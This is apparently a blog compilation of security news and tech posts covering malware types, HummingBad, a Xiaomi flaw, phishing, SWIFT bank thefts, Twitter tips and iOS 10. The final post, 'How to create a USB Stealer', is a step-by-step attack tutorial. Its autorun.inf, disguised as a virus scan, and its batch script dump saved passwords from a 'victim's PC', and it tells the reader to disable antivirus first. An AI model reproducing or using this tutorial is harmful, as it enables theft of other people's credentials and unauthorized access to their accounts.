All About Malwares

According to Wikipedia, Malware, short for malicious software, is any software used to disrupt computer operations, gather sensitive information, gain access to private computer systems, or display unwanted advertising.Malicious software was called computer virus before the term malware was coined in 1990 by Yisrael Radai.

Malwares are generally used for stealing accounts, passwords and confidential data. Malwares are very dangerous if they get install in our computers or cell phones. Malware can open a backdoor if they enter in our Computer and then an attacker might able to steal confidential information and can do whatever he want.

He can even turn on our webcam or can access to any file or folder.

Generally, malware gets install on our computer or cell phones if we click on any malicious link which redirects us to a malicious website and the malware automatically gets install in our devices.

Spyware or other malware is sometimes found embedded in programs supplied officially by companies, e.g., downloadable from websites, that appear useful or attractive, but may have, for example, additional hidden tracking functionality that gathers marketing statistics. An example of such software, which was described as illegitimate, is the Sony rootkit, a Trojan embedded into CDs sold by Sony, which silently installed and concealed itself on purchasers' computers with the intention of preventing illicit copying; it also reported on users' listening habits, and unintentionally created vulnerabilities that were exploited by unrelated malware.

DIFFERENT TYPES OF MALWARE

1. Adware:. The least dangerous and most lucrative Malware. Adware displays ads on your computer.
2. Spyware:. Spyware is software that spies on you, tracking your internet activities in order to send advertising (Adware) back to your system.
3. Virus: A virus is a contagious program or code that attaches itself to another piece of software, and then reproduces itself when that software is run. Most often this is spread by sharing software or files between computers.
4. Worm: A program that replicates itself and destroys data and files on the computer. Worms work to “eat” the system operating files and data files until the drive is empty.
5. Trojan: The most dangerous Malware. Trojans are written with the purpose of discovering your financial information, taking over your computer’s system resources, and in larger systems creating a “denial-of-service attack ” Denial-of-service attack: an attempt to make a machine or network resource unavailable to those attempting to reach it. Example: AOL, Yahoo or your business network becoming unavailable.
6. Rootkit: This one is likened to the burglar hiding in the attic, waiting to take from you while you are not home. It is the hardest of all Malware to detect and therefore to remove; many experts recommend completely wiping your hard drive and reinstalling everything from scratch. It is designed to permit the other information gathering Malware in to get the identity information from your computer without you realizing anything is going on.
7. Backdoors: Backdoors are much the same as Trojans or worms, except that they open a “backdoor” onto a computer, providing a network connection for hackers or other Malware to enter or for viruses or SPAM to be sent.
8. Keyloggers: Records everything you type on your PC in order to glean your log-in names, passwords, and other sensitive information, and send it on to the source of the keylogging program. Many times keyloggers are used by corporations and parents to acquire computer usage information.  
9. Rogue security software: This one deceives or misleads users. It pretends to be a good program to remove Malware infections, but all the while it is the Malware. Often it will turn off the real Anti-Virus software. The next image shows the typical screen for this Malware program, Antivirus 2010
10. Ransomware: If you see this screen that warns you that you have been locked out of your computer until you pay for your cybercrimes. Your system is severely infected with a form of Malware called Ransomware. It is not a real notification from the FBI, but, rather an infection of the system itself. Even if you pay to unlock the system, the system is unlocked, but you are not free of it locking you out again. The request for money, usually in the hundreds of dollars is completely fake.
11. Browser Hijacker:  When your homepage changes to one that looks like those in the images inserted next, you may have been infected with one form or another of a Browser Hijacker. This dangerous Malware will redirect your normal search activity and give you the results the developers want you to see. Its intention is to make money off your web surfing. Using this homepage and not removing the Malware lets the source developers capture your surfing interests. This is especially dangerous when banking or shopping online. These homepages can look harmless, but in every case they allow other more infectious 

 CREDIT TO:http://www.malwaretruth.com/the-list-of-malware-types/

How to stay safe from malware

Here are the tips to stay safe from malware:

1. Install Antivirus/malware software
2. Keep your software up-to-date
3. Keep your OS up-to-date
4. Run scan regularly
5. Secure your browsing via web antiviruses.
6. Do not click on links or sites which you don't trust
7. Do not use Public Wifi
8. Backup your files
9. Use strong passwords

HOPE YOU LIKE THIS ARTICLE, SHARE WITH YOUR FRIENDS USING SHARE BUTTONS BELOW. :)

Read more

What is Android OS?

Android is a mobile operating system developed by Google as an open source Linux-based platform for third party companies to build off. The open nature of Android means developers and manufacturers can work with the platform for free and change it to their own designs. Since its inception, Android has gone through many guises and has positioned itself as the most used mobile platform in the world, while also branching out into other areas (TV, cars, and wearables). However, the Android ecosystem remains deeply fragmented and the platform is deemed as insecure compared to rivals by many commentators.
 In today's date, almost half of people use Android smartphones.
As the users of Android smartphones increases day by day, threats related to Android are also increasing day by day.
By the way Android is a good OS.

Read more

'HummingBad' malware creators making $300k a month.

'HummingBad' Malware creators are making $300,000 a month. 'HummingBad" malware, ANDROID infecting malware already infected 10 million android devices which I have mentioned in my earlier post.

You can read here: Cell phone Malware infected 10 million users worldwide

 Researchers have revealed that they are making $300,000; increasing daily as more are more devices are infected.

The HummingBad malware was reported to have spread in China, India, the Philippines, and Indonesia. However, Android phone owners living in other countries are not safe from the said mobile infection as there have been 288,000 reported infections in the United States also, CNET reported.

The malware does not just act as a spy to download and steal information from one's phone like what a malware usually does. Instead, HummingBad can transfer personal information, spy on the victims, and turn the infected phones into botnets, since it also has the ability to get root access. The malware is being used purely for revenue generation by remotely clicking on ads to make them seem popular than they actually are. They also try to install fake versions of popular apps, Digital Spy reported.

Share with your friends on social media.
Leave a comment.

Read more

Millions of Xiaomi phones are at risk due to Malware.

Xiaomi Phones

According to the latest news, Millions of Xiaomi phones are vulnerable to that an attacker can install Malware remotely to it.

The vulnerability was found in the analytics package inn Xiaomi's custom built Android-based  operating system. Security researchers at IBM, who found the flaw, discovered a number of apps in the package that were vulnerable to a remote code execution flaw through a man-in-the-middle attack -- one of which would allow an attacker to run arbitrary code at the system-level.

In other words, an attacker could inject a link to a malicious Android app package, which is extracted and executed at the system level.

Xiaomi, the world's third-largest smartphone maker with more than 70 million devices shipped last year, fixed the flaw in a recent update.

Users should update their devices as soon as possible -- though, updates aren't (as far as we can tell) delivered over an encrypted channel.

This kind of attack vector, however, isn't new, and has been seen in other platforms.

These flaws rely on a lack of encryption and code-checking and verification. Because these updates aren't provided over an encrypted TLS (HTTPS) connection, they can be easily modified. Encryption prevents anyone from modifying the data in transit, and ensure that a man-in-the-middle attack is almost impossible to carry out.

It's not even the first time this kind of attack was discovered this year.

Earlier this year, a similar set of flaws were found in preinstalled software on Windows PCs -- so-called bloatware. This meant millions of laptops and desktops were at risk of having malware injected as it's being downloaded from the internet.

The researchers who found the vulnerabilities said that the "average potted plant" could exploit the flaws.
Fortunately, the vulnerability has been fixed now.

If you found this article useful, Share this article using share buttons below the article.

Read more

Cell phone Malware infected 10 million users worldwide

There is a latest news in the field of cybersecurity. A cellphone virus infected 10 million people across the world.

A virus Malware from China called "HummingBad" was downloaded by the users who keep insecure apps from unknown sources in their phones without having knowledge about that.

“And what it does is it gets route access to your device. It collects all your information and it also does an additional thing where it clicks on ads and all the ads essentially pop up and all your information gets sent out to those ads,” said Alex Hy with StayMobile in Spartanburg.

User can also get Malware by clicking on malicious links.

Today Michael Holmes came in to get his phone repaired. He says safeguarding his most important possession from accidents is hard enough, let alone hackers.

“To know you can get a virus that easily on your phone and it’s doing all kinds of stuff that’s out of your control, that scares me,” said Holmes.

HOW DO YOU KNOW YOU HAVE IT?

To figure out if you have a virus, download antivirus software like Zone Alarm, AVG orAvast, and do a scan.

HOW DO YOU GET RID OF IT?

The only way to get it off your phone is to do a complete factory reset. So that means you’ll lose any data that you’re not able to save on an SD card.

HOW DO YOU AVOID IT?

Make sure you only download apps from Google Play or iTunes, and avoid clicking on links in social media or texts. The anti-virus software for your phone will also help.

HummingBad is one of the first widespread cell phone viruses, but it certainly won’t be the last.

“It makes me real nervous because that’s probably just the beginning,” said Holmes.

Related Posts on this topic:'HummingBad' malware creators making $300k a month
                                                        

                                                  All About Malwares

Share with your friends on social media.
Leave a comment.

Read more

The Top 8 Twitter tricks to enhance your Twitter experience.

The top 8 Twitter tricks to enhance your Twitter experience, to make your profile looks better and to increase followers are below.


CUSTOMIZE YOUR PROFILE

Use your real photo as the Twitter profile picture. It makes your profile be a personal account.

Create and upload your background image or you can say the cover photo of a recommended size of 1600x1200 for a large image.

Include keywords in your Twitter bio which helps users to find you easily.


USING THIRD-PARTY TOOLS

Use third-party tools to enhance your Twitter experience. Some of my favourites tools are below:

Qwitter: It's a great service which sends you an email anytime if a user unsubscribe (unfollow) you and also mention a post made by you or a reason by which the user leave or unfollow you.

TwitPic: As you can guess from the name. It is used to post pictures on your tweets.

Twitterific (app): To post pictures on Twitter when you're away from your computer, you can use this app.

WeFollow: It's a great website from which you can make an about page of yourself using different tags you find interesting. You can also add yourself to a list of Twitter users.

Manageflitter: It's a site from which you can manage your Twitter followers, can get an overview of users not following you back, followers, unfollowers etc.

SocialOomph: Collection of free Twitter tools which you can use for different purposes.

Twitter Fan Wiki apps: As same as above this is a collection of hundreds of different types of Twitter tools which you can use.


TWITTER SEARCH

You can use Twitter search in many ways. Some tips for using Twitter search are:

You can search for your blog or your website URL and can see if others people mention your blog or website.

You can search for your nearby places like I live in New Delhi, so I can search for 'NEW DELHI' , and it will show the current latest tweets using New Delhi keyword in them.

You can search for the people you like in a particular category searching for the keyword you interested and want to find that type of people.

If you want to see tweets without any links you add ?filter:links at the end of your search.

If you need more options in search, you can use Advanced Twitter search.

You can also save your search results if you find any search result best, by clicking on "Save this search" button. After saving your search result, you can found them under "Saved Searches" on the right-hand part of your profile.


FOLLOWERS

Do not follow too many peoples. This not seems quite good to see that a person having 20 followers follow 1000s of peoples.

Engage followers by tweeting interesting posts.

Retweet interesting posts.

Participate in conversations with peoples or in any interesting topic having a lot of followers.
It may help you to increase followers.


CREATING USEFUL AND INTERESTING TWEETS

Make interesting, useful or funny tweets.

Do not post your personal and boring tweets, for e.g. feeling good, eating snacks etc.
Make many tweets frequently. You can tweet 10 times a week or 5 times a day. More no. of tweets more no. of followers.

Add hashtags(#) in your tweet keywords.

Make useful and valuable tweets at the times they just happened and when people are more likely to see them.

You can use special characters such as smiley in your posts.


FOLLOW THE MASTERS OF SOCIAL NETWORKING SITES : TWITTER

Follow some great peoples or yo can say masters of Twitter which gives you knowledge about how to tweet.                    

     Such top 10 twitters are:

@GuyKawasaki

@kevinrose
@timoreilly
@donttrythis
@zappos
@brainpicker

@Scobleizer
@jeffbullas
@briansolis

@tonyrobbins

Use Twitaholic to get top 10 users of Twitter according to followers.

USE MOBILE APP

Use the Twitter mobile app on your android, ios blackberry, windows phones to tweet quickly.

ADVERTISE

Advertise your twitter profile on your website or blog.

---------------------------------------------------------------------------------

Hope you like this post. Share and comment.

You can also subscribe me to get update of such interesting posts

If you have any queries, contact me. :)

Read more

117 million LinkedIn Emails and Passwords are on sale on DarkWeb

There was a hack in LinkedIn databases in 2012 which still cause problems to users. As you may or may not remember that many time passed when hackers broke into the LinkedIn's network in 2012 and about 6.5 million encrypted passwords and posted it to the Russian hacker forums. As many of the passwords were stored as unsalted SHA-1 hashes, hundreds of thousands were quickly cracked.The passwords are encrypted with 'no salt' which makes them easier to crack.

That hacking is still creating problems for LinkedIn users as many of the users didn't change their passwords yet.

By the way, it was an old news. I just wanted to remind you.
Now the main topic and the latest news is that a Hacker knows by the name "Peace" is trying to sell a huge LinkedIn database which contains 167 million LinkedIn users account on a dark web(dark market) called TheRealDeal just only for 5 Bitcoins or $2,200. In all of these 167 million accounts database, only 117 million accounts data include both email and password encrypted.


=>So now, in my advice change your password to stay protected and safe from hackers.

Read more

Top 10 Features of Apple ios 10

There is a great news for Apple fans. Apple has released its latest operating system for Apple iPhone called ios 10.

It's touted as the best iOS ever as they touting since their first iOS.

On June 13, the Cupertino company presented all the new features using the phrase "Top 10 Countdown" for the quick interaction of people.

So, I will not bore you with the wish to tell you this is the top 10 features.

And here are these Top 10 features of latest Ios 10:

Voicemail Transcriptions

This feature allows you that you not have to listen to those boring voicemail anymore. Because the new ios will transcribe your voicemail into text which you can read instead of listening.

Deleting Default Apps

As you all aware that smartphones come with pre-installed apps which we didn't want sometimes. The new ios 10 have features to delete default apps like Podcasts, calendar, and Reminders etc.

Adorable Emojis

ios 10 brings a new feature for apple phones. Now you can use emojis instead of words.

It means if you type a sentence and then select emojis keyboard, the words itself get highlighted which can be replaced by emojis. It's is a good feature in new ios 10 as this is the year 2016 and using emojis instead of text looks creative.

Upgraded Siri

The upgraded Siri in new ios 10 has given it a new lease of life by opening the personal assistant up to third party developers.

This means you'll be able to ask Siri to send a WhatsApp, order an Uber and so on.

Apple new music app

In ios 10, the Apple music app makes new changes in his structure and appearance to navigate easily. ios 10 also added lyrics option in Apple music.

Widgets

Widgets make our work easier to open the apps quickly. You can add all apps which you want to access in widgets option. 
Now ios 10 introduced widgets option for Apple phones. Now you can access apps from the lock screen of iPhone and while using 3d touch on an app.

Markup photos

Now you can add text  and can draw all over the photo.

Apple iMessage

Like Facebook or WhatsApp messenger, now you can send Pictures, GIFs, videos using the iMessage app of new ios 10.

Finding your car

Using Siri, now you can find your car and get directions of your car if your car equipped with Bluetooth.

Sleep Reminders

You can use sleep reminders to schedule your time to get sleep and to get awake.Then the new ios 10 sleep reminder will send reminders when it's time to go to bed and when it's time to get awake.




:) Hope you like this post. Don't forget to comment and share.

If you want to get the latest updates of my posts. Then Subscribe to my blog.

Read more

This man wrongly sent £45,000 which he spent on cocaine and gambling.

A man who was mistakenly overpaid by a huge amount more than £45,000 by the Barclays Bank has been in trouble after spending about ten thousand pounds on gambling, cocaine. drinking etc.
Steven Burke, of Grosvenor Crescent, Scarborough said that he lived a millionaire lifestyle after receiving an unexpectedly huge amount of money  in his Barclays account on January 29.

This 43-year-old man Steven Burke was supposed to have received £446 for his work. But by the typing error of the director, he was sent 100 times more money than his intended money.
Instead of returning the money, Burke started spending them all over on drinking, cocaine, alcohol, buying expensive clothes and many more items of his needs.
Varlow told Scarborough Magistrates' Court on Monday (4 July): "He spent the money on a car, an electronic-cigarette, hotel rooms, designer clothes, a gold chain, cocaine and vodka as well as online gambling. In total, he spent more than £28,000 and approximately £15,000 was recovered."

Burke was eventually caught by police after a request by his employer to hand the money back went unanswered.Despite initially telling police he thought he had been a victim of "cyber crime" when he noticed the money in his account, he eventually pleaded guilty to receiving wrongful credit. He will be sentenced at York Crown Court on 25 July where he could face time in prison.
This is just one latest case in the line of many such cases in which public find themselves being overpaid and not paying back that money which they had been given by mistake.
There is one such case, in 2014, a single-mother Michaela Hutchings ordered to pay back an amount of  £52,000  which had been sent accidently to her. She spent about £8,000 on designer clothes, expensive shoes, handbags, sunglasses etc. in just two days.
She agreed to pay the money after being caught by the police and thus escaped from prison.
In law, Under Section 24A of the 1968 Theft Act, anyone who fails to pay back the money they know was sent in error could receive a prison sentence of up to 10 years.

Read more

What is Phishing?

Phishing

Many of you've heard about phishing or the word phishing. If you hadn't heard this before, then, there are certain questions which may come to your mind like,

1. What is Phishing?

2. It seems like the word 'Fishing'?

3. How does it work?


This post is for those who have the above questions in their mind.
The topic 'Phishing' may be clear to you in this article.

The definition of phishing is very simple and easy to understand.

Phishing is a form of fraud in which an attacker fools you to take your confidential data, passwords, bank account information, credit card details, email or any other communication details.
Phishing is very popular among cybercriminals as it is easier to trick someone for one click on their malicious link through which an attacker can take access of the data, account or any other information.
The word 'Phishing' is the homophone of 'Fishing'. As you all know that Fishing is the activity of catching fishes in which a person tries to catch fishes in his trap.
Just as same, in Phishing an attacker tries to fool a victim in his trap.
I think, the definition of Phishing has become clear to you all now.

Now, the question is that How does it work?
In simple language,
In this technique, an attacker sends a malicious link to the victims and tries to fool him to click on that link.

In long, an attacker designs a malicious web page and sends it to the victim via email or some other communication. The victim receives a message or emails which seem to have come from some organisation or company which contains a malicious link. When the victims click on that malicious link, the victims redirect to a fake website or web page that look same alike as the real website or web page. When the victim enters his personal data like (passwords, emails) on that web page, the attackers receives his personal data mostly in a .txt file.
I hope that you understand.

Facebook, twitter, Gmail and other social networking sites can be hacked using this technique.

Conclusion

• Never click on the link on which you don't trust.

• Always check the URL of the link. Because the malicious link URL never same as the real website URL. For example, if an attacker sends you a fake malicious link of Facebook. It never be same as www.facebook.com, it may be www.faccebok.com but not same as the real facebook URL.

IF YOU HAVE ANY QUESTIONS, YOU CAN LEAVE THE QUESTION IN COMMENT BOX.

Share this article to your friends.

Read more

National Crime Agency (NCA) report on cybercrime

There has been a lot of increase in Cyber Crimes and Cyberattacks from past 5 years. As you know that in the year 2015 and 2016, we listen almost one cybercrime news over 10 general news.
And now, As per the report of NCA (NATIONAL CRIME AGENCY) saying that criminals are winning the cyber race against business and law enforcement.
Various security professionals have offered their views and analysis on this topic:

Ben Harknett, VP EMEA, RiskIQ:

“There are numerous forms of cybercrime making up those 2.64 million incidents. Research we carried out at RiskIQ revealed that malvertising, as just one of those, jumped up over 300 percent year on year between 2014 and 2015 following a string of major publishing sites such as Forbes.com, Huffington Post and The Daily Mail being exploited by malvertising campaigns.

“We live our online lives ‘in the moment’ and although most people know better than to click on a link from an unknown source, malvertising attacks are disguised as trusted brands on trusted websites and so by their nature are much more difficult for a conusmer to spot.”

Luke Brown, VP and GM EMEA, India and LatAm, Digital Guardian:

“It’s no surprise that the NCA warns that criminals are winning the cyber arms race: the IT security industry simply doesn’t have the troops to fight back. For many years, the industry has faced a recruitment drought and individuals who meet the required training standards are hard to come by and highly sought after. In fact, the unemployment rate amongst information security professionals is effectively zero.

“The issue is that businesses can’t simply deploy security technologies and expect to be protected from every kind of attack, they need to work with security experts. The UK government’s plan to open a new National Cyber Security Centre is certainly a step in the right direction, but without more widespread investment to train more cyber security recruits, this war will continue to rage on.”

Paul Simpson, Principal Consultant, Verizon RISK:

“Our 2016 Data Breach Investigation Report found that many businesses still lack basic security defences, or have implemented or configured them incorrectly – this is unbelievable when we are aware of the cybercriminal activity around us. For example, we saw 63 percent of confirmed data breaches involving weak, default or stolen passwords.

“Some of the reasons behind this are reliance on old security policies; security being more of an afterthought in a business’ strategy rather than a priority or even just down to lack of good employee education. Often businesses forget that their employees are often an easy route for any opportunistic hacker looking to find their way into an organisation via phishing emails, as they commonly make mistakes that leave their doors wide open.

“Awareness is the first and best line of defence against cyber-criminals – CIOs also need to stay in touch with the latest security threats, and share that knowledge throughout the organisation. My immediate advice to any company is to ensure that the security basics and procedures are already in place to help mitigate the impact of a future cyber-attack. Prevention is often better than cure and the effectiveness of implemented security and incident processes should be tested and measured for effectiveness.  This can be done via a concentrated security approach.”

Wieland Alge, VP & GM EMEA, Barracuda Networks:

“We see multiple cyber crime assessments of this kind carried out across Europe – all of which show the same patterns – and yet companies are still not taking the necessary actions to protect themselves and their customers. Many companies are still ignorant to the fact that everyone has become a target. An astonishing number are still surprised that they have been attacked at all. The simple truth is that the digital transformation of crime is outpacing the digital transformation of companies and also the transformation of cyber defence.

“That said, modern cyber threats are no longer simple to defend against. The crucial change in recent years has been that cyber criminals are shifting towards more targeted scams and more advanced malware that cannot be detected by traditional scanners. What’s more, the increase in mobility and sheer volume of devices has exponentially increased the potential attack surface. We are in a kind of golden age for digital crime. The business has injected change at accelerating speed into all elements of IT and many organisations are simply trying to keep their security stable. It has become quite easy for attackers to find an unprotected door.”

David Emm, Principal Security Researcher, Kaspersky Lab:

“The National Crime Agency’s new research confirms what we have understood for some time – that cybercriminals are becoming more resourceful and efficient in attacking corporate and government systems.

“The NCA’s findings are a warning to all organisations that it is simply no longer enough to protect the perimeter of a corporate network. The business environment has changed significantly in recent years; mobile working has created more fluid business systems and companies need to develop an in-depth defence strategy, including how to minimise the impact of a breach – rather than simply relying on blocking threats at the perimeter.

“It’s also vital that businesses develop processes to restrict the room for manoeuvre of attackers. For example, not providing blanket admin access to all employees and segmenting the network to limit the scope of a breach. I would also stress that as individual consumers we need to be more aware of the cyber-security threats being carried out around us, with more people than ever trying to steal our personal and corporate information.”

Leave a comment for this article.

Read more

Facebook related crimes have been increased by 50 percent in PAKISTAN

According to the latest reports, there have been 50 percent increase facebook related crimes in Pakistan. And most of the victims are womens.
 FIA (THE FEDERAL INVESTIGATION AGENCY) said that there has been a phenomenal increase in cyber crime complaints and without a “relevant law” it is facing problems to deal with them. “In Punjab alone we received 2,100 Facebook-related complaints such as fake ID, uploading of obscene pictures, hacking of the account and threatening messages last year. We have received more than 1,600 complaints by mid of this year. Same is the situation in other stations as well,” FIA Lahore Cyber Crime Wing head Shahid Hasan said. He said most of the complaints are from women whose ID’s were either hacked or obscene pictures were loaded from their fake IDs.
“We have only one law – Electronic Crime Ordinance which hardly covers any crime in the cyber world – thus we are having problems in getting suspects convicted,”?he said. ? ? Hasan further said Pakistan desperately needs cyber crime law to deal with crimes in the cyber world. The FIA said it was awaiting the passage of the Prevention of Electronic Crimes Bill 2015, commonly known as cyber crime bill, from the Senate to deal with cyber crimes. “The new law will help it check ever-rising cyber crime such as cyber stalking, fake and stolen identities on Facebook, Twitter and other social media links,” he said. The proposed cyber crime bill criminalises activities such as sending text messages without the receiver’s consent or criticising government actions on social media with heavy fines and long-term imprisonment.

Read more

An Ukranian Bank lose $10 million in a latest cyber attack.

A bank in Ukraine loses $10 million in a latest cyber attack which was done by exploiting the vulnerability in the bank communication network. Hackers break into the Ukranian bank internal system and submit fraud money via SWIFT(the messaging system responsible for carrying out money transfers between financial institutions worldwide.)

The Ukrainian theft is similar to a February cyber-attack in which hackers managed to steal millions of dollars from the central bank of Bangladesh. In that attack, the cyber attackers used stolen operator credentials to submit 35 fraudulent SWIFT transfer requests totalling $951 million. Five of the requests passed, and the criminals made off with $81 million funnelled through a web of offshore companies. In a statement, SWIFT said that “the attackers clearly exhibit a deep and sophisticated knowledge of specific operational controls within the targeted banks – knowledge that may have been gained from malicious insiders or cyberattacks, or a combination of both.”

Banks in Ecuador and Vietnam also report similar cyber-attacks, suggesting that SWIFT-based threats to financial institutions may be on the rise.

News of the Ukrainian attack comes just weeks after the Federal Financial Institutions Examination Council (FFIEC) issued a statement reminding U.S. banks of the need to “actively manage the risks associated with interbank messaging and wholesale payment networks.” The FFIEC recommends that banks take the following multi-step approach to warding off SWIFT and other message-based attacks: Conduct ongoing information security risk assessments.

• Perform security monitoring, prevention, and risk mitigation.
• Protect against unauthorized access.
• Implement and test controls around critical systems regularly.
• Manage business continuity risk.
• Enhance information security awareness and training programs.
• Participate in industry information-sharing forums.

Read more

How to create a USB Stealer

Welcome back to THE HACKERS POINT. Friends, today I am here with a new trick or you can say tutorial 'How to create a USB Stealer'.

          As you, all know that windows store most of its passwords in browser. e.g. in chrome,firefox etc. as most of the users have not enough time and they allow browsers to save their passwords. 

Taking the advantage I am here to teach you How to create a USB Stealer.

First of all, these are the things which you need:

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.


Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

Note: Please disable your antivirus before performing all these steps.

1.First of all download all 5 tools and copy the executables (.exe( files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now you're ready with your USB stealer. Insert your USB in victim's PC and a popup window appear, in popup window select (launch virus scan) and you will get the passwords in .txt file.

Hope you like my post.

Share with your friends.

Read more